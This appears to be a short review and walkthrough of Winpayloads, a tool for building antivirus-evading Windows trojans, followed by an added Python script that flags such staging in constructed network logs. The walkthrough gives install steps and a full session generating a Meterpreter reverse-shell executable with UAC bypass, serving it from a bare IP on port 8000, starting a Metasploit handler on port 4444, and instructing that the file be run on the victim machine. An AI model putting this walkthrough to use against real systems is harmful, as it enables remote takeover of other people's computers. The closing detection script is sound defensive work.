Tool link: https://github.com/nccgroup/Winpayloads

Introduction: Winpayloads is a tool for building Windows trojans that are meant to evade antivirus detection.

Installation:
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
chmod +x setup.sh
./setup.sh

This is what it looks like when started after installation:
(Winpayloads ASCII banner) NCCGroup - CharlieDean
================================ Main Menu ================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients
?: Print Detailed Help
back: Main Menu
exit : Exit
===========================================================================
Main Menu >
Usage: for example, to generate a Windows Meterpreter Reverse Shell:
Main Menu > 2
[*] Press Enter For Default Port(4444)
[*] Port> 4444
[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP>
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444
[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
[*] Upload To Local Websever or (p)sexec? [y]/p/n: y
[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
(Metasploit ASCII banner)
=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) >
On the victim machine, open http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe and run it.
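As an added example that is not part of the original post or of Winpayloads, the following Python script shows what the walkthrough above looks like from the network side and how a defender can correlate it: a client fetching an .exe from a bare-IP URL on port 8000 and then opening a connection to port 4444 on the same IP (the handler port chosen above). The log lines and their format are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log lines (not real traffic). Assumed format:
#   <ISO time> <client_ip> <event> <dst_ip>:<dst_port> [<url>]
# where event is "http_get" (web proxy) or "tcp_connect" (firewall/NetFlow).
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.5 http_get 1.1.1.16:8000 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
2024-05-01T10:00:09 10.0.0.5 tcp_connect 1.1.1.16:4444
2024-05-01T10:01:00 10.0.0.7 http_get 93.184.216.34:80 http://example.com/index.html
2024-05-01T10:02:00 10.0.0.7 tcp_connect 1.1.1.16:4444
2024-05-01T10:03:00 10.0.0.9 http_get 1.1.1.16:8000 http://1.1.1.16:8000/notes.txt
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<event>\S+) (?P<dst>[\d.]+):(?P<port>\d+)(?: (?P<url>\S+))?$"
)
# An executable fetched from a raw IP address (no hostname) is the staging pattern above.
BARE_IP_EXE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/[^?]*\.exe$", re.I)

def parse(log_text):
    """Yield one dict per well-formed log line, with typed timestamp and port."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.fromisoformat(d["ts"])
            d["port"] = int(d["port"])
            yield d

def find_staged_shells(log_text, handler_port=4444, window_s=300):
    """Return (client, staging_ip, url) for each .exe download from a bare-IP URL
    that is followed, within window_s seconds, by a connection from the same
    client to handler_port on the same IP (download then call-back)."""
    events = list(parse(log_text))
    hits = []
    for dl in events:
        if dl["event"] != "http_get" or not dl["url"] or not BARE_IP_EXE.match(dl["url"]):
            continue
        for c in events:
            if (c["event"] == "tcp_connect" and c["src"] == dl["src"]
                    and c["dst"] == dl["dst"] and c["port"] == handler_port
                    and timedelta(0) <= c["ts"] - dl["ts"] <= timedelta(seconds=window_s)):
                hits.append((dl["src"], dl["dst"], dl["url"]))
                break
    return hits

if __name__ == "__main__":
    for client, stager, url in find_staged_shells(SAMPLE_LOG):
        print(f"{client}: fetched {url} then connected to {stager}:4444")
```

Only the first client matches: the second never downloaded an executable and the third downloaded a text file, so neither is reported.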
Evaluation: it does not actually achieve full antivirus evasion, probably because the tool has been around for so long, but the way it generates the trojan is quite simple and worth a try.